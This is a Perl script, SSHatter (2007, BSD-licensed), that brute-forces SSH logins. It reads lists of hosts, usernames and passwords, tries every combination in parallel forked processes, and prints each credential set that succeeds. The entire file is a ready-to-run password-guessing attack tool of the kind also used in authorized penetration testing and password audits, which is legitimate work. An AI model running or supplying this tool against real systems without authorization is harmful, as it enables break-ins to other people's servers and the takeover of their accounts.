#!/usr/bin/perl -w
# $Header: /var/lib/cvsd/var/lib/cvsd/SSHatter/src/SSHatter.pl,v 1.2 2007-08-10 03:27:35 timb Exp $
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the Nth Dimension nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (c) Tim Brown, 2007
# <mailto:timb@nth-dimension.org.uk>
# <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>

use strict;
use Parallel::ForkManager;
use Net::SSH::Perl;

my $maximumprocess;
my $hostnamefilename;
my $usernamefilename;
my $passwordfilename;
my $forkmanager;
my $hostnamefilehandle;
my $hostname;
my $usernamefilehandle;
my $username;
my $passwordfilehandle;
my $password;
my $processid;
my $sshhandle;

if (@ARGV != 4) {
	die "usage: " . $0 . " <maximumprocess> <hostnamefilename> <usernamefilename> <passwordfilename>";
}
$maximumprocess = shift;
$hostnamefilename = shift;
$usernamefilename = shift;
$passwordfilename = shift;
if ($maximumprocess =~ /([0-9]+)/) {
	$maximumprocess = $1;
} else {
	die "usage: " . $0 . " <maximumprocess> <hostnamefilename> <usernamefilename> <passwordfilename>";
}
if (! -e $hostnamefilename) {
	die "usage: " . $0 . " <maximumprocess> <hostnamefilename> <usernamefilename> <passwordfilename>";
}
if (! -e $usernamefilename) {
	die "usage: " . $0 . " <maximumprocess> <hostnamefilename> <usernamefilename> <passwordfilename>";
}
if (! -e $passwordfilename) {
	die "usage: " . $0 . " <maximumprocess> <hostnamefilename> <usernamefilename> <passwordfilename>";
}

$forkmanager = new Parallel::ForkManager($maximumprocess);
open($hostnamefilehandle, "<" . $hostnamefilename);
while (<$hostnamefilehandle>) {
	$hostname = $_;
	$hostname =~ s/\x0a//g;
	open($usernamefilehandle, "<" . $usernamefilename);
	while (<$usernamefilehandle>) {
		$username = $_;
		$username =~ s/\x0a//g;
		open($passwordfilehandle, "<" . $passwordfilename);
		while (<$passwordfilehandle>) {
			$password = $_;
			$password =~ s/\x0a//g;
			$processid = $forkmanager->start() and next;
			eval {
				$sshhandle = Net::SSH::Perl->new($hostname);
			};
			if ($@ ne "") {
				print STDERR "Net::SSH::Perl->new() failed: " . $@;
			} else {
				print "[sshatter] trying " . $username . "@" . $hostname . "/" . $password . "\n";
				eval {
					$sshhandle->login($username, $password);
				};
				if ($@ ne "") {
					if ($@ !~ /Permission denied/) {
						print STDERR "Net::SSH::Perl->login() failed: " . $@;
					}
				} else {
					print "[sshatter] " . $username . "@" . $hostname . "/" . $password . ":success\n";
				}
			}
			$forkmanager->finish();
		}
		close($passwordfilehandle);
	}
	close($usernamefilehandle);
}
close($hostnamefilehandle);
$forkmanager->wait_all_children();
exit(1);
